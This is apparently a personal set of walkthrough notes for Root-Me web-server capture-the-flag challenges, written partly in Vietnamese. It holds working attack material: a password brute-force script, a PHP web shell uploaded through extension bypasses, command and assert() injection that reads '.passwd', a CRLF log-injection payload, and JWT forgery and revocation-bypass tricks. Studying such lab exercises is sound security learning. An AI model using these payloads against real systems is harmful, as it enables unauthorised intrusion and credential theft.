🏝️Web - Server

Note : A JOURNEY TO GAIN KNOWLEDGE

Web - Server

1.HTML - Source code

F12 for flag

2.HTTP - IP restriction bypass

document

Syntax: X-Forwarded-For: <client>,<proxy1>,<proxy2>,<proxy3>

Change IP at client to private IP by adding an X-Forwarded-For header

3.HTTP - Open redirect

It combines URL and hash md5 of that one, so that we just put other URL and hash of it.

4.HTTP - User-agent

change User-Agent to `admin`

5.Weak password

import requests
from requests.auth import HTTPBasicAuth
url = "http://challenge01.root-me.org/web-serveur/ch3/"
usr = "admin"
words = open('common_password.txt','r').read().split('\n')
cnt =1
for pwd in words:
	print(pwd,cnt)
	
	res = requests.get(url, auth=HTTPBasicAuth(usr, pwd))
	
	if "401" not in res.text:
		print('Password is ' + pwd)
		break
	cnt +=1

6.PHP - Command injection

document

7.Backup file

Use dirsearch find some interesting files:

/web-serveur/ch11/index.php~

8.HTTP - Directory indexing

http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt

9.HTTP - Headers

With normal request we will get:

add Header to request:

Header-RootMe-Admin: True

10.HTTP - POST

11.HTTP - Improper redirect

Capture before it redirect

12.HTTP - Verb tampering

Ban đầu tưởng bruteforce ngồi xài hydra và cái rockyou.txt ra spam cả tiếng

temper ở đây là chỉ cần đổi method khác ngoài GET và POST là được, cứ PUT với DELETE mà phang

13.File upload - Double extensions

<?php echo shell_exec($_GET['cmd']); ?>

set file.php.png and send to the server

?cmd=cd;cat .passwd

14.File upload - MIME type

Change Content-Type to image/png and rce

?id=cd;cat .passwd

15.HTTP - Cookies

chan

change cookie from visiteur to admin

16.JSON Web Token (JWT) - Introduction

"none" signature algorithms

17.Directory traversal

Try with ../ and fuzz

18.JSON Web Token (JWT) - Weak secret

bruteforce secret key: lol

sign new signature

POST and look for the flag hm....

19.File upload - Null byte

create: file.php%0a.png

<?php echo shell_exec('id'); ?>

20.Install files

use dirsearch: /web-serveur/ch6/phpbb/install

21. JWT - Revoked token

source

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from flask_jwt_extended import JWTManager, jwt_required, create_access_token, decode_token
import datetime
from apscheduler.schedulers.background import BackgroundScheduler
import threading
import jwt
from config import *
 
# Setup flask
app = Flask(__name__)
 
app.config['JWT_SECRET_KEY'] = SECRET
jwtmanager = JWTManager(app)
blacklist = set()
lock = threading.Lock()
 
# Free memory from expired tokens, as they are no longer useful
def delete_expired_tokens():
    with lock:
        to_remove = set()
        global blacklist
        for access_token in blacklist:
            try:
                jwt.decode(access_token, app.config['JWT_SECRET_KEY'],algorithm='HS256')
            except:
                to_remove.add(access_token)
       
        blacklist = blacklist.difference(to_remove)
 
@app.route("/web-serveur/ch63/")
def index():
    return "POST : /web-serveur/ch63/login <br>\nGET : /web-serveur/ch63/admin"
 
# Standard login endpoint
@app.route('/web-serveur/ch63/login', methods=['POST'])
def login():
    try:
        username = request.json.get('username', None)
        password = request.json.get('password', None)
    except:
        return jsonify({"msg":"""Bad request. Submit your login / pass as {"username":"admin","password":"admin"}"""}), 400
 
    if username != 'admin' or password != 'admin':
        return jsonify({"msg": "Bad username or password"}), 401
 
    access_token = create_access_token(identity=username,expires_delta=datetime.timedelta(minutes=3))
    ret = {
        'access_token': access_token,
    }
   
    with lock:
        blacklist.add(access_token)
 
    return jsonify(ret), 200
 
# Standard admin endpoint
@app.route('/web-serveur/ch63/admin', methods=['GET'])
@jwt_required
def protected():
    access_token = request.headers.get("Authorization").split()[1]
    with lock:
        if access_token in blacklist:
            return jsonify({"msg":"Token is revoked"})
        else:
            return jsonify({'Congratzzzz!!!_flag:': FLAG})
 
 
if __name__ == '__main__':
    scheduler = BackgroundScheduler()
    job = scheduler.add_job(delete_expired_tokens, 'interval', seconds=10)
    scheduler.start()
    app.run(debug=False, host='0.0.0.0', port=5000)

Use python request to post data:

import requests

url = "http://challenge01.root-me.org/web-serveur/ch63/login"
myobj = {"username": "admin","password": "admin"}
x = requests.post(url, json = myobj)

print(x.text)
#{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NjA3MzI2MjcsIm5iZiI6MTY2MDczMjYyNywianRpIjoiNzFjYTYxYTEtNjU1Yy00Zjk5LTkwM2ItODViZjBjMjI4ZmQ3IiwiZXhwIjoxNjYwNzMyODA3LCJpZGVudGl0eSI6ImFkbWluIiwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.7koOz8cupf0o2ZtMA_pr_03cKXq-uIcTgp6zGKMts-g"}

The problem that we have to bypass blacklist because with each access_token it will be added to blacklist:

• with rfc3548 we can see that the character out of alphabet will be skipped

• underscore “_” , then replace with “/”

• add == in the end of jwt -> fast way to understand

22. CRLF

Input -> fuzz

Thử nhập bừa username và passoword ta thấy rõ log ghi lại username -> tấn công từ đây

Mục tiêu là có thể log lạiadminauthenticated.

?username=admin authenticated.%0d%0aa&password=b

gửi payload trên url và urlencode để server decode lại

23. Insecure Code Management

doc

http://challenge01.root-me.org/web-serveur/ch61/.git

24.PHP - assert()

doc

doc2

Detect lỗi File Inclusion -> LFI via PHP's 'assert

Khả nghi:

GET /web-serveur/ch47/?page= ...

command:

' and die(system("cat .passwd")) or '